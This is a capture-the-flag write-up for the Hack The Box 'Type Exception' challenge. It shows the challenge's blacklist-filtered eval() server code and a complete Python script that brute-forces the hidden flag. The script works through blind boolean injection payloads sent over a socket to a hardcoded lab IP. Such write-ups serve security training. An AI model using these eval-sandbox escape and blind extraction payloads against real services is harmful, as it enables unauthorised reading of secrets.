[Hack The Box Write-Up: Type Exception]
Let's start with the context to understand this task and its solution. The task is a CTF challenge (Capture The Flag), commonly used for testing skills in information security. The primary objective is to extract the "flag," which is a hidden string.
General Overview of the Task
- We have server-side Python code that accepts a string from the user.
- This string is checked against a set of conditions.
- If the string meets all the conditions, it is passed to the eval() function for execution.
- We need to extract the hidden "flag" stored in a variable.
Now, let's look at the challenge code in more detail.
import re
with open("./flag.txt") as f:
FLAG = f.read().strip()
BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'
OPEN_LIST = '('
CLOSE_LIST = ')'
def check_balanced(s):
stack = []
for i in s:
if i in OPEN_LIST:
stack.append(i)
elif i in CLOSE_LIST:
pos = CLOSE_LIST.index(i)
if ((len(stack) > 0) and
(OPEN_LIST[pos] == stack[len(stack)-1])):
stack.pop()
else:
return False
return len(stack) == 0
def check(s):
if re.match(r"[a-zA-Z]{4}", inp):
print("You return home.")
elif len(set(re.findall(r"[\W]", inp))) > 4:
print(set(re.findall(r"[\W]", inp)))
print("A single man cannot bear the weight of all those special characters. You return home.")
else:
return all(ord(x) < 0x7f for x in s) and all(x not in s for x in BLACKLIST) and check_balanced(s)
def safe_eval(s, func):
if not check(s):
print("\U0001F6B6" + "\U0001F6B6" + "\U0001F6B6")
else:
try:
print(eval(f"{func.__name__}({s})", {"__builtins__": {func.__name__: func}, "flag": FLAG}))
except:
print("Error")
if __name__ == "__main__":
while True:
inp = input("Input : ")
safe_eval(inp, type)
First up, the function “check_balanced” scrutinizes the string to ensure that the opening and closing brackets are properly aligned, returning a True or False based on the outcome. Next in line, the function “check” performs a triple-threat analysis on the input string: it verifies that the string kicks off with four letters; tallies up the number of unique special characters, capping them at four; and finally, ensures that all characters are ASCII-approved, not on the blacklist. Last but not least, the function “safe_eval” serves as the gateway for code injection and the last line of defense, executing the code only after a successful vetting by the “check” function, limiting access to specific functions and the FLAG variable, and then sits tight, awaiting the next input in an endless loop.
So, what are our constraints?
- Symbol restrictions: We can't use certain symbols, including spaces, commas, and colons. This means standard Python constructs like "if x == y" can't be used directly.
- Unique symbol limit: No more than 4 unique symbols are allowed in the string, e.g., the string "((()))" has only two unique symbols: "(" and ")". This narrows down our choice of operators and functions.
- Exception handling: All exceptions are caught by the server and returned as "Error." This means we need to be particularly cautious with code that could throw an exception.
- Limited eval context: Only the type function and the flag variable are accessible, meaning functions and classes like list, print, set, str, dir, etc., are not available.
- Parentheses: They must be paired. "()" is acceptable; ")(" is not.
And what can we do?
- Allowed symbols: The allowed symbols are !#$()+.?^.
- Replace
==
withis
: We can use "is" instead of “==” for comparison. - Use hexadecimal numbers: To circumvent symbol restrictions, we can use hexadecimal numbers to represent characters.
- Class restriction workaround: The list class is restricted, but we can do type(flag.split()) to create a list instance.
- Types as responses: If the code works, the type of the result will be output. For example, 1 will return
.
Let's get to the solution
It's not a solution in a couple of lines of code. In it, we will use several loops to extract the flag, and brute force will take additional time. You can see the full solution here.
import socket
import string
import time
from collections import defaultdict
from enum import Enum
class Answer(Enum):
NO = 0
YES = 1
ERROR = 2
if_construction = "(1)if({check})else(None)"
def netcat(content) -> Answer:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("164.92.147.43", 1337))
s.sendall(content)
s.shutdown(socket.SHUT_WR)
answer = None
while True:
data = s.recv(1024)
if len(data) == 0:
break
if b"<class 'NoneType'>" in data:
answer = Answer.NO
if b"<class 'int'>" in data:
answer = Answer.YES
if b"Error" in data:
answer = Answer.ERROR
s.close()
return answer
def find_first_index(character, occupied):
print("Finding first index: ", end="")
for index in range(100):
if index in occupied:
continue
print(".", end="")
first_index_check = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
result = netcat(first_index_check)
if result == Answer.YES:
print(f" {index}")
return index
if result == Answer.ERROR:
print("Not used")
return None
return None
def find_last_index(character, start, occupied):
print("Finding last index ", end="")
for index in range(100):
if index <= start:
continue
if index in occupied:
continue
print(".", end="")
last_index_check = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
result = netcat(last_index_check)
if result == Answer.YES:
print(f" {index}")
return index
return None
def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
print(f'Searching for {count - 2} indexes between {first_index} and {last_index}: ', end="")
if (last_index - first_index + 1) == count:
# case when unknown indexes are left just in between two edge indexes
found_indexes = list(range(first_index + 1, last_index))
print(", ".join(map(str, found_indexes)))
return found_indexes
# We need a list class to convert a generator to a list
list_class = "type(flag.split())"
# "regular" generator that iterates over flag symbols
flag_generator = "((i)for(i)in(flag.encode()))"
# converting generator to a list
flag_list = f"{list_class}({flag_generator})"
found_indexes = []
for char_index in range(first_index + 1, last_index):
if char_index in occupied:
# this index contains already-known character
continue
if len(found_indexes) + 2 == count:
# all indexes for this char were found .no need to check other
continue
print(".", end="")
check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
result = netcat(check_index)
if result == Answer.YES:
print(f" {char_index}", end="")
found_indexes.append(char_index)
print()
return found_indexes
def find_count(character):
print("Finding count ", end="")
for count in range(1, 20):
print(".", end="")
check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
result = netcat(check_count)
if result == Answer.YES:
print(f" {count}")
return count
return None
if __name__ == "__main__":
start_time = time.time()
occupied_indexes = []
found_chars = defaultdict(dict)
for char_str in string.printable:
char_hex = hex(ord(char_str))
print(f"\nChecking <{char_str} {char_hex}>")
# Checking
first_index = find_first_index(char_hex, occupied_indexes)
if first_index is None:
# This character is not present in flag
continue
found_chars[char_str]["indexes"] = [first_index]
occupied_indexes.append(first_index)
# Checking how many duplicates of this character are in the flag
count = find_count(char_hex)
found_chars[char_str]["count"] = count
# If a character occurred more than once, then we can find its index from the end
if count > 1:
last_index = find_last_index(char_hex, first_index, occupied_indexes)
found_chars[char_str]["indexes"].append(last_index)
occupied_indexes.append(last_index)
# If the character occurred more than 2 times, then we can find other occurrences between the first and last known index
if count > 2:
indexes = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
found_chars[char_str]["indexes"] += indexes
found_chars[char_str]["indexes"].sort()
occupied_indexes += indexes
indexes = []
# Just converting dict with indexed in the list that can be then sorted to join into the final string
for char_str, char_data in found_chars.items():
for index in char_data["indexes"]:
indexes.append((index, char_str))
indexes.sort(key=lambda data: data[0])
flag = "".join(char_str for _, char_str in indexes)
print()
print(flag)
print(f"Finished in {round(time.time() - start_time)} sec.")
First step
We kick off by checking for the letter 'A' (hex '0x41') in the flag string and whether it's at index 0.
Injection: (1)if(flag.encode().index(0x41)is(0))else(None)
Readable: 1 if flag.encode().index(0x41) is 0 else None
Server responses: an integer means it's at index 0; 'NoneType' means it's elsewhere; 'Error' means it's not in the string at all.
Second step
We count how many times 'A' (hex '0x41') appears in the string.
Injection: (1)if(flag.encode().count(0x41)is(1))else(None)
Readable: 1 if flag.encode().count(0x41) is 1 else None
Server responses: an integer confirms the count; 'NoneType' means try again.
Third step
We've found the first index for each character; now we look for the last index.
Injection: (1)if(flag.encode().rindex(0x41)is(0))else(None)
Readable: 1 if flag.encode().rindex(0x41) is 0 else None
Note: Upon reflection, this step may be redundant as knowing the first index and count suffices.
Fourth step
We brute-force the remaining characters that appear more than twice.
Injection: (1)if(type(flag.split())(((i)for(i)in(flag.encode()))).pop(1)is(0x41))else(None)
Readable: 1 if type(flag.split())(i for i in flag.encode()).pop(1) is 0x41 else None
How it works:
- type(flag.split()) creates a list since 'list' class isn't in the eval context.
- (i)for(i)in(flag.encode()) turns the string into an iterator, which we convert to a list.
- .pop({char_index})is({character}) extracts the element at the index and compares it to our ASCII characters.
This way, we can efficiently brute-force the remaining unknown indices in the string and uncover the flag string, one index at a time.